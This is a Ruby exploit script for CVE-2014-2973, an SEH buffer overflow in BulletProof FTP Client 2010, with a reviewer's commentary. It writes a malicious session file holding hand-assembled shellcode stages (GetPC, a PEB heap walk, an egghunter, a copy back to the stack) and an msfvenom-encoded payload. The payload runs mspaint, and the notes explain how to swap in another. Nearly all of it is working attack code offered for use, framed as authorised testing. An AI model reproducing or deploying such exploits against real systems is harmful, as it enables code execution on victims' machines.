Created
December 9, 2014 15:17
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit v2
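#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass buffer size limitation for bigger payload. Allocate 2nd
# shellcode in heap and copy back to stack. This exploit use egghunter
# to locate 2nd shellcode in heap and copy to stack. Load the exploit file
# and click connect to trigger the exploit.
#
# Proof-of-concept for authorised testing only. Running this script only
# writes a malicious session file (xsession.bps); nothing is exploited until
# the vulnerable client loads that file and "Connect" is clicked. The
# payload below was generated with CMD=mspaint, i.e. it is benign.
#
# Layout of the file this script produces:
#   header line; buff (500 bytes: GetPC stub, SEH fix-up stub, the
#   three-stage stack shellcode, nSEH at offset 89 and SEH at 93, 'A'
#   filler); "\r\nanonymous\r\n"; heap_sc (egg tag + msfvenom payload);
#   trailer. At runtime: SEH -> pop/pop/ret -> nSEH short jump -> GetPC ->
#   fix-up -> heap_addr (first process heap) -> egghunter (find "w00tw00t")
#   -> copy_sc (rep movsb the payload back onto the stack, jmp eax).
#
# Review notes:
#   * Every byte string is forced to ASCII-8BIT (String#b, Ruby >= 2.0).
#     On a Ruby whose default source encoding is UTF-8 the "\x.." literals
#     are UTF-8 strings and String#[]= / #size count *characters*: the
#     adjacent bytes \xc7\xb9 in copy_sc form a valid 2-byte UTF-8 sequence,
#     so stack_sc.size was 89 for 90 bytes, buff[30,stack_sc.size] replaced
#     one 'A' too few (buff grew to 501 bytes) and bps.size under-reported
#     the output size. In binary every offset below is a byte offset, as
#     intended, and the force_encoding("utf-8") hack on the pack('V')
#     result is no longer needed. The original was presumably tested with
#     the 501-byte buff; the extra byte was trailing filler far past the
#     SEH record, so the difference is not expected to matter.
#   * The rep movsb count in copy_sc is derived from heap_sc, so swapping in
#     another msfvenom payload keeps the copy length right, and both
#     buffers are checked for bad characters before the file is written.
#   * The summary line interpolates the filename (the original printed the
#     literal text "#(unknown)") and reports bytesize.

# Concatenate the given pieces as raw bytes (ASCII-8BIT), whatever source
# encoding Ruby assigned to the "\x.." literals.
def binstr(*parts)
  parts.map(&:b).join
end

# Offset
seh = 93
filename = "xsession.bps"

# Bad characters. heap_badchars is what msfvenom was told to avoid in the
# heap payload (see the command below). stack_badchars is the list the
# original author recorded ("badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2'"); it
# evidently applies to the stub placed in buff, not to heap_sc, which itself
# contains \xb1, \x83 and \xb2.
heap_badchars = "\x00\x0a\x0d\x1a".b.bytes
stack_badchars = "\x00\x0a\x0d\x1a\xb1\x83\xb2".b.bytes

buff = ("A" * 500).b

# ./msfvenom -p windows/exec CMD=mspaint -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby
# 8-byte egg tag "w00tw00t" followed by the 226-byte encoded payload.
heap_sc = binstr(
  "w00tw00t",
  "\xda\xc4\xbf\xd7\xec\x92\xb5\xd9\x74\x24\xf4\x5d\x33\xc9",
  "\xb1\x32\x83\xed\xfc\x31\x7d\x16\x03\x7d\x16\xe2\x22\x10",
  "\x7a\x3c\xcc\xe9\x7b\x5f\x45\x0c\x4a\x4d\x31\x44\xff\x41",
  "\x32\x08\x0c\x29\x16\xb9\x87\x5f\xbe\xce\x20\xd5\x98\xe1",
  "\xb1\xdb\x24\xad\x72\x7d\xd8\xac\xa6\x5d\xe1\x7e\xbb\x9c",
  "\x26\x62\x34\xcc\xff\xe8\xe7\xe1\x74\xac\x3b\x03\x5a\xba",
  "\x04\x7b\xdf\x7d\xf0\x31\xde\xad\xa9\x4e\xa8\x55\xc1\x09",
  "\x08\x67\x06\x4a\x74\x2e\x23\xb9\x0f\xb1\xe5\xf3\xf0\x83",
  "\xc9\x58\xcf\x2b\xc4\xa1\x08\x8b\x37\xd4\x62\xef\xca\xef",
  "\xb1\x8d\x10\x65\x27\x35\xd2\xdd\x83\xc7\x37\xbb\x40\xcb",
  "\xfc\xcf\x0e\xc8\x03\x03\x25\xf4\x88\xa2\xe9\x7c\xca\x80",
  "\x2d\x24\x88\xa9\x74\x80\x7f\xd5\x66\x6c\xdf\x73\xed\x9f",
  "\x34\x05\xac\xf5\xcb\x87\xcb\xb3\xcc\x97\xd3\x93\xa4\xa6",
  "\x58\x7c\xb2\x36\x8b\x38\x4c\x7d\x91\x69\xc5\xd8\x40\x28",
  "\x88\xda\xbf\x6f\xb5\x58\x35\x10\x42\x40\x3c\x15\x0e\xc6",
  "\xad\x67\x1f\xa3\xd1\xd4\x20\xe6\xbc\xa9\xae\x68\x57\x20",
  "\x3b\x6b"
)

# Stage 1: find the address of the process's first heap by walking
# TEB -> PEB -> ProcessHeaps[0]. Constants are formed as
# 0x7777xxxx - 0x7777777f so that no byte of the stub is a bad character.
heap_addr = binstr(
  "\x50",                       # push eax            ; eax = address of buff[1] (from GetPC); popped again by copy_sc
  "\xbb\xaf\x77\x77\x77",       # mov ebx,0x777777af
  "\x81\xeb\x7f\x77\x77\x77",   # sub ebx,0x7777777f  ; ebx = 0x30
  "\x64\x8b\x1b",               # mov ebx,fs:[ebx]    ; fs:[0x30] = TEB.ProcessEnvironmentBlock -> PEB
  "\xb9\x0f\x78\x77\x77",       # mov ecx,0x7777780f  (the original comment said ebx; opcode b9 is ecx)
  "\x81\xe9\x7f\x77\x77\x77",   # sub ecx,0x7777777f  ; ecx = 0x90
  "\x8b\x1c\x0b",               # mov ebx,[ebx+ecx]   ; PEB+0x90 -> ProcessHeaps array
  "\x8b\x1b"                    # mov ebx,[ebx]       ; first heap
)

# Stage 2: classic int 0x2e egghunter (syscall 2 is used only as a safe
# "is this page readable?" probe), scanning from the heap base in ebx for
# the doubled tag "w00tw00t". Exits with edi just past the tag, i.e. at the
# first byte of the payload.
egghunter = binstr(
  "\x8b\xd3",               # mov edx,ebx           ; scan pointer = heap base
  "\xeb\x05",               # jmp $+0x5 (#2)        ; skip the page step on entry
  "\x66\x81\xca\xff\x0f",   # or dx,0x0fff (#1)     ; page unreadable: go to its last byte
  "\x42",                   # inc edx (#2)          ; ... then to the next page / next byte
  "\x52",                   # push edx
  "\x6a\x02",               # push 2
  "\x58",                   # pop eax               ; eax = 2 (syscall number)
  "\xcd\x2e",               # int 0x2e
  "\x3c\x05",               # cmp al,5              ; low byte of STATUS_ACCESS_VIOLATION (0xc0000005)
  "\x5a",                   # pop edx
  "\x74\xef",               # je $-0xf (#1)
  "\xb8\x77\x30\x30\x74",   # mov eax,0x74303077    ; our tag 'w00t'
  "\x8b\xfa",               # mov edi,edx
  "\xaf",                   # scasd                 ; [edi] == 'w00t' ?  edi += 4
  "\x75\xea",               # jne $-0x14 (#2)
  "\xaf",                   # scasd                 ; second 'w00t'
  "\x75\xe7"                # jne $-0x17 (#2)
)

# Stage 3: copy the payload found in the heap back onto the stack and run it.
copy_len = heap_sc.bytesize - 8              # everything after the 8-byte tag (226 here)
copy_sc = binstr(
  "\x58",                                    # pop eax               ; address of buff[1], pushed by heap_addr
  "\x05\x54\xf2\xff\xff",                    # add eax,-3500         ; destination: a stack address below buff (author-found free area)
  "\x89\xfe",                                # mov esi,edi           ; source: first payload byte
  "\x89\xc7",                                # mov edi,eax
  "\xb9", [0x7777777f + copy_len].pack('V'), # mov ecx,0x7777777f+len (0x77777861 for 226 bytes)
  "\x81\xe9\x7f\x77\x77\x77",                # sub ecx,0x7777777f    ; ecx = len
  "\xf2\xa4",                                # rep movsb
  "\xff\xe0"                                 # jmp eax
)
stack_sc = heap_addr + egghunter + copy_sc   # 90 bytes, all ASCII-8BIT

# GetPC: fstenv stores the FPU environment so that the address of the
# fldpi (buff+1) lands at [esp]; pop eax makes that the base for the
# fix-up stub below.
buff[1, 2] = "\xd9\xeb".b              # fldpi
buff[3, 5] = "\x9b\xd9\x74\x24\xf4".b  # fstenv [esp-0xc]
buff[8, 1] = "\x58".b                  # pop eax              ; eax = address of buff[1]

# FixRet stub: three "mov dword [eax+disp8],imm32" that restore, at runtime,
# shellcode bytes that are not intact in memory when the stub runs:
#   eax+0x44 = buff[69] = seh-24 (not modified in the file; presumably
#              clobbered by the exception dispatch before control arrives),
#   eax+0x58 = buff[89] = seh-4  (holds the nSEH jump in the file),
#   eax+0x5c = buff[93] = seh    (holds the handler address in the file).
# The 0x45454545 immediates are placeholders patched below.
buff[9, 7]  = "\xc7\x40\x44\x45\x45\x45\x45".b  # (1) mov [eax+0x44],imm32
buff[16, 7] = "\xc7\x40\x58\x45\x45\x45\x45".b  # (2) mov [eax+0x58],imm32 ; place holder for jmp
buff[23, 7] = "\xc7\x40\x5c\x45\x45\x45\x45".b  # (3) mov [eax+0x5c],imm32 ; place holder for ppr
buff[30, stack_sc.bytesize] = stack_sc          # byte length: buff stays exactly 500 bytes

# Repair stack: copy the original stack_sc bytes into the three immediates
# before the nSEH/SEH overwrite below destroys two of them in the file.
buff[12, 4] = buff.byteslice(seh - 24, 4)  # original sc (1)
buff[19, 4] = buff.byteslice(seh - 4, 4)   # original sc (2)
buff[26, 4] = buff.byteslice(seh, 4)       # original sc (3)
buff[seh - 4, 4] = "\xeb\xa6\x41\x41".b    # nSEH: jmp short -0x5a -> buff[1] (the GetPC stub)
buff[seh, 4] = [0x72d11f39].pack('V')      # SEH: ppr in msacm32.drv, the only non-SafeSEH module without a null byte

# Sanity checks before writing: a bad character in either region would
# silently produce a file that does not trigger.
bad = buff.bytes & stack_badchars
abort "bad character(s) in stack buffer: #{bad.map { |b| format('\x%02x', b) }.join}" unless bad.empty?
bad = heap_sc.bytes & heap_badchars
abort "bad character(s) in heap payload: #{bad.map { |b| format('\x%02x', b) }.join}" unless bad.empty?

# Session file: fixed header line, the overflowing field, "anonymous",
# the heap payload, trailer.
bps = binstr(
  # "This is a BulletProof FTP Client Session-File and should not be modified directly.\r\n"
  "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75",
  "\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54",
  "\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73",
  "\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E",
  "\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74",
  "\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64",
  "\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A",
  buff,                                               # the overflowing field (500 bytes)
  "\x0D\x0A\x61\x6E",                                 # "\r\nan"
  "\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A",             # "onymous\r\n"
  heap_sc,                                            # egg tag + payload
  "\x62\x70\x69",                                     # "bpi"
  "\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D", # "cplnkiibmfe\r"
  "\x0A"                                              # "\n"
)

File.binwrite(filename, bps)
puts "Exploit file: #{filename} size: #{bps.bytesize}"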